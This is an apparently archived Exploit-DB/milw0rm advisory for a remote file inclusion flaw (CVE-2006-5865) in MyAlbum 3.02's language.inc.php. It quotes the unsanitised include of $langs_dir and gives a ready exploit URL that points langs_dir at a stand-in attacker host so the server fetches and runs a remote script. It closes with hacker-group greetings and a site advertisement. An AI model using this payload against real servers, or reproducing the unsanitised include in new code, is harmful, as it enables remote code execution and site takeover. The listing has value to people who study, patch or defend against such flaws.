MyAlbum <= 3.02 language.inc.php Remote File Inclusion Vulnerability

2006-11-09T00:00:00
ID EDB-ID:2747
Type exploitdb
Reporter Silahsiz Kuvvetler
Modified 2006-11-09T00:00:00

Description

MyAlbum <= 3.02 (language.inc.php) Remote File Inclusion Vulnerability. CVE-2006-5865. Webapps exploit for php platform

                                        
                                            #==============================================================================================
#MyAlbum &lt;= 3.02 (langs_dir) Remote File Inclusion Vulnerability
#===============================================================================================
#
#Critical Level : hm...i think...
#
#Script Dowload : http://www.comscripts.com/jump.php?action=script&id=1731
#
#Version : 3.XX (maybe others...)
#
#================================================================================================
#
#Bug in :
#
#./language.inc.php
#================================================================================================
#
#Vulnerable Code :
#
#
#         include($langs_dir."/messages.".$lang.".php");
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[MyAlbum_DIR]/language.inc.php?langs_dir=http://evilsite.com/evilscript.txt?
#
#
#================================================================================================
#Discoverd By : Silahsiz Kuvvetler The TURKISH DEVELOPER
#
#Contact : co-type[at]hotmail[dot]com
#
#GreetZ : |FATTALGAZI!| - |MADWORM| - |NARCOTIC| - |MR.TROJAN| - |TILKIANDRE| - |EDORAS| - | XVCX |
#
#AND ALL STARHACK USERZZ...
#
#Special Thanqs : str0ke - 0xyGen
#
#Reklam Kokan Hareket :d ===&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; WWW.STARHACK.ORG &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;=======
#
#==================================================================================================

# milw0rm.com [2006-11-09]